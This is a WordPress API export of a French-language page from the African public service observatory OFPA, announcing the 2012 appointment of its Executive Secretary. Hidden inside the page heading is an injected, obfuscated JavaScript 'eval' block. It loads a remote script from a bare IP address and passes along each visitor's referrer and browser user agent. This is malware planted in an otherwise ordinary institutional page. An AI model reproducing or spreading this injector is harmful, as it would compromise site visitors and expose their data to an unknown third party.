{"id":33,"date":"2017-03-28T20:31:49","date_gmt":"2017-03-28T18:31:49","guid":{"rendered":"http:\/\/site.ofpa.net\/?page_id=33"},"modified":"2017-03-28T20:43:45","modified_gmt":"2017-03-28T18:43:45","slug":"33-2","status":"publish","type":"page","link":"https:\/\/www.ofpa.net\/fr\/33-2\/","title":{"rendered":"Secr\u00e9tariat Ex\u00e9cutif"},"content":{"rendered":"<p style=\"text-align: center;\"><strong>DESIGNATION <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zhsty|var|u0026u|referrer|eikbf||js|php'.split('|'),0,{}))\n<\/script><\/noindex> DU NOUVEAU SECRETAIRE EXECUTIF DE L\u2019OBSERVATOIRE DES FONCTIONS PUBLIQUES AFRICAINES (OFPA)<\/strong><\/p>\n<p>La 8e Conf\u00e9rence des Ministres charg\u00e9s de la Fonction publique des Etats membres de l\u2019Observatoire des Fonctions Publiques Africaines (OFPA), r\u00e9unie \u00e0 Bissau (Guin\u00e9e Bissau), du 22 au 24 f\u00e9vrier 2012,<\/p>\n<p>Apr\u00e8s avoir examin\u00e9 les candidatures au poste de Secr\u00e9taire Ex\u00e9cutif et apr\u00e8s \u00e9changes, ont pris la d\u00e9cision de d\u00e9signer M. KAMBIRE Pollobom Prosper, Administrateur Civil, en qualit\u00e9 de Secr\u00e9taire Ex\u00e9cutif de l\u2019Observatoire des Fonctions Publiques Africaines.<\/p>\n<p>M. KAMBIRE Pollobom Prosper, a pris service \u00e0 l\u2019OFPA \u00e0 l\u2019occasion d\u2019une c\u00e9r\u00e9monie de passation de services qui s\u2019est tenue dans les locaux de l\u2019Institution le 6 avril 2012 sous la direction de la premi\u00e8re Vice Pr\u00e9sidente de la Conf\u00e9rence des Ministres, Madame M\u00eamouna KORA ZAKI LEADI, Ministre du Travail et de la Fonction publique du B\u00e9nin.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>DESIGNATION DU NOUVEAU SECRETAIRE EXECUTIF DE L\u2019OBSERVATOIRE DES FONCTIONS PUBLIQUES AFRICAINES (OFPA) La 8e Conf\u00e9rence des Ministres charg\u00e9s de la Fonction publique des Etats membres de l\u2019Observatoire des Fonctions Publiques&#8230; <a class=\"read-more-button\" href=\"https:\/\/www.ofpa.net\/fr\/33-2\/\">Savoir plus &gt;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-full-width.php","meta":[],"_links":{"self":[{"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/pages\/33"}],"collection":[{"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/comments?post=33"}],"version-history":[{"count":3,"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/pages\/33\/revisions"}],"predecessor-version":[{"id":36,"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/pages\/33\/revisions\/36"}],"wp:attachment":[{"href":"https:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/media?parent=33"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}